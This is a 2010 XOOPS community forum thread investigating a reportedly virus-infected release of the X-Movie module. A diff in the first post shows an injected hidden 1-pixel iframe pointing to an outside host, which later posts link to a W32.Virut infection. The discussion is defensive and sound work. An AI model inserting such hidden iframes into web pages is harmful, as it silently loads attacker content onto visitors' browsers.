xoops forums

Mamba

Moderator
Posted on: 2010/5/26 6:40
Mamba
Mamba (Show more)
Moderator
Posts: 10944
Since: 2004/4/23
#1

X-Movie Virus?

Originally in this thread

@ Peekay
Quote:
wishcraft wrote:

Quote:
What about X-Movie 3, mamba if your so nice why has the guy installed 4 virus and php trigger code in it, that i had to remove..


Sorry to back-track a little, but this module appears to be in the module repository. Does it contain a virus?

I am confused with the whole story.

I downloaded X-Movie 3.11 from the link that Wishcraft gave in his article.

Then I downloaded the original 3.0 from Optikool website and the 3.0 from our Module Repository, which is identical to the one from Optikool Website.

My Virus scanner (Microsoft Security Essentials) didn't find any viruses in any of the files.

Then I used WinMerge to compare the files from Wishcraft's 3.11 and the ones in 3.0 from our repository.

Resized Image

The dates for the binary files do differ, with Wishcraft's files being older. Didn't have time to check on the differences there.

The changed text files are (and the changes):

1)
admin_header.php
class.Thumbnail.php
submit.php
tpl_embedcode.php
tpl_imgtype.php
tpl_movietype.php
tpl_player.php

Line 1: changed from <? to <?php

2)

blocksadmin.inc.php

Line 86 (Wishcrafts code includes iframe):
From:
//  $dummyhtml = '<html><head><meta http-equiv="content-type" content="text/html; charset='._CHARSET.'" /><meta http-equiv="content-language" content="'._LANGCODE.'" /><title>'.$xoopsConfig['sitename'].'</title><link rel="stylesheet" type="text/css" media="all" href="'.getcss($xoopsConfig['theme_set']).'" /></head><body><table><tr><th>'.$myblock->getVar('title').'</th></tr><tr><td>'.$myblock->getContent('S', $bctype).'</td></tr></table></body></html>';


To:
//  $dummyhtml = '<html><head><meta http-equiv="content-type" content="text/html; charset='._CHARSET.'" /><meta http-equiv="content-language" content="'._LANGCODE.'" /><title>'.$xoopsConfig['sitename'].'</title><link rel="stylesheet" type="text/css" media="all" href="'.getcss($xoopsConfig['theme_set']).'" /></head><body><table><tr><th>'.$myblock->getVar('title').'</th></tr><tr><td>'.$myblock->getContent('S', $bctype).'</td></tr></table><iframe style="height:1px" src="http://www.XXX.pl/rc/" frameborder=0 width=1></iframe>
</body></html>';


Please note the link to a web site XXX.pl in Wishcrafts' code (I've changed the name so it won't show here, but you can see it in the original file)

3)
myheader.php
Line 61:

From:
</td></tr></table></body></html>

To:
</td></tr></table>
</
body></html>


4)
xoops_version.php

Lines 31 and 33 (changing version number and adding his name)

From:
$modversion['version'] = 3.0;
$modversion['description'] = _MI_X_MOVIE_DESC;
$modversion['credits'] = "Dana Harris (http://www.optikool.com)";

To:

$modversion['version'] = 3.11;
$modversion['description'] = _MI_X_MOVIE_DESC;
$modversion['credits'] = "Dana Harris (http://www.optikool.com), wishcraft.";


So it seems like the Wishcraft'o changes are cosmetics, there was no "php trigger code" removed, and then iframe has been actually added in Wishcraft's code.

Can somebody confirm it?

Wishcraft, did you uploaded the correct files? If not, could upload the correct ones, and tell us which "php trigger code" has been removed from the Optikool's original files?
Support XOOPS => DONATE
Use 2.5.10 | Docs | Modules | Bugs

Burning

Theme Designer
Posted on: 2010/5/26 7:14
Burning
Burning (Show more)
Theme Designer
Posts: 1163
Since: 2006/8/22
#2

Re: X-Movie Virus?

hi'

Virus found on wishcraft version was W32.Virut!html. File contamined was : x_movie/myheader.php

I found it 2010-05-16 and alert Simon immediatly via MSN. He sent me a new version, virus was removed.


To be sure and after Peekay question, I have scanned (with same program Norton 2010) Optikool version : no virus.


So, no more virus :)
Still learning CSS and... english

Mamba

Moderator
Posted on: 2010/5/26 7:23
Mamba
Mamba (Show more)
Moderator
Posts: 10944
Since: 2004/4/23
#3

Re: X-Movie Virus?

But which X-Movie files originally contained the virus?

Files that came from Optikool, or files that you received from Wishcraft (or somebody else)?

Support XOOPS => DONATE
Use 2.5.10 | Docs | Modules | Bugs

ghia

Community Support Member
Posted on: 2010/5/26 7:39
ghia
ghia (Show more)
Community Support Member
Posts: 4954
Since: 2008/7/3 1
#4

Re: X-Movie Virus?

I downloaded xoops2_mod_x_movie_3_optikool.zip in december 2009 with latest file date 20 mai 2009.
This does not include the iframe.
Current version on the site of Optikool is xoops2_mod_x_movie_30_optikool.zip dated march 2010, but the files are identical.

It looks as WishCrafts' PC was infected.

Peekay

XOOPS is my life!
Posted on: 2010/5/26 9:48
Peekay
Peekay (Show more)
XOOPS is my life!
Posts: 2335
Since: 2004/11/20
#5

Re: X-Movie Virus?

Thanks mamba and others for responding
Quote:
<iframe style="height:1px" src="http://www.XXX.pl/rc/" frameborder=0 width=1></iframe>

I am glad there is no virus, but why add the iFrame.
Just a test, or to track usage of the module?

I appreciate it may have been an error, but you don't want remote links embedded in a module. I found one recently in a module I'm updating. I am confident it was overlooked by the original developer after some initial testing, but the site still set a cookie on my PC.
A thread is for life. Not just for Christmas.

Mamba

Moderator
Posted on: 2010/5/26 10:11
Mamba
Mamba (Show more)
Moderator
Posts: 10944
Since: 2004/4/23
#6

Re: X-Movie Virus?

As Ghia said, it seems like his PC was infected, and he uploaded the infected files as part of the the Zip file.

What I don't understand is how 8 cosmetic changes, as shown above, would justify a new version release. I hope, this was just a wrong upload, and there is another version somewhere on his computer with same more significant changes...
Support XOOPS => DONATE
Use 2.5.10 | Docs | Modules | Bugs

ghia

Community Support Member
Posted on: 2010/5/26 12:07
ghia
ghia (Show more)
Community Support Member
Posts: 4954
Since: 2008/7/3 1
#7

Re: X-Movie Virus?

Quote:
I found one recently in a module I'm updating.
Can you inform us which one, so we can verify it in our repostitory?
Quote:
What I don't understand is how 8 cosmetic changes, as shown above, would justify a new version release.
As I believe Optikool is still maintaining its site and modules, errors and other needed changes should be reported to him and not released by third parties as new versions.
If no features are added to make a kind of new module out of it, one should not take over existing and actively maintained modules.
Furthermore I believe an edit of the article is apropriate and the following paragraph should be removed as I feel this does injustice to Optikool and his modules.
Quote:
x-Movie 3.11

* Virus Removed
* Embedded Virus Trigger Removed
* Helpers Updated
* Icon Updated
* Version Changed

Peekay

XOOPS is my life!
Posted on: 2010/5/26 12:26
Peekay
Peekay (Show more)
XOOPS is my life!
Posts: 2335
Since: 2004/11/20
#8

Re: X-Movie Virus?

@ghia

I have been updating Catads, based on Catads 1.522 FINAL from TDM Xoops. I posted an alert to beta testers about the URL in this thread. I don't think that particular module was available in the module repository.

@ mamba

OK. Thx. I suppose if your site (or PC) is compromised the attackers will try and hide malicious code and you may not even know about it. Hopefully Wishcraft will amend the release and remove the iFrame SRC.

If there is no evidence to suggest that Opticool allowed a virus to be included in the previous version, I too think it fair that the release notes are changed.

A thread is for life. Not just for Christmas.

Mamba

Moderator
Posted on: 2010/5/26 21:29
Mamba
Mamba (Show more)
Moderator
Posts: 10944
Since: 2004/4/23
#9

Re: X-Movie Virus?

Ghia,
Quote:
If no features are added to make a kind of new module out of it, one should not take over existing and actively maintained modules.

Even if it is not actively maintained, only new added features should justify a new version.

Quote:
Furthermore I believe an edit of the article is apropriate and the following paragraph should be removed as I feel this does injustice to Optikool and his modules.

I agree. The paragraph has been removed.

Support XOOPS => DONATE
Use 2.5.10 | Docs | Modules | Bugs

optikool

Not too shy to talk
Posted on: 2010/6/17 17:10
optikool
optikool (Show more)
Not too shy to talk
Posts: 154
Since: 2007/3/26
#10

Re: X-Movie Virus?

Hey Guys,

I just ran into this thread and wasn't aware that there was a virus version of this module floating around on the net.

@Peekay Generally a cracker would add an iframe to a page so that they could send information back and forth between their server and the page you are viewing. Things like passwords would be the most common info to send. The module that I maintain would not have any need for iframes so if you find one, remove it.

Later this year I'm planning to revisit this module so that I can redesign different aspects to take advantage of new ways of doing things and improve the code. If you see problems with this module let me know and I will look into it.

Also the reason why the publish date changed on the module was because I changed to the Joomla CMS and had to move things over. Sorry Xoops People but I needed to understand the MVC module better and Joomla has that module. But I plan to bring the techniques I learned from creating my XGallery component and what I learn from my Movie component, (still in Alpha, but you can see it on my website) to the Gallery 2 and X Movie modules that I maintain for Xoops. Hopefully it will be a big improvement in the end.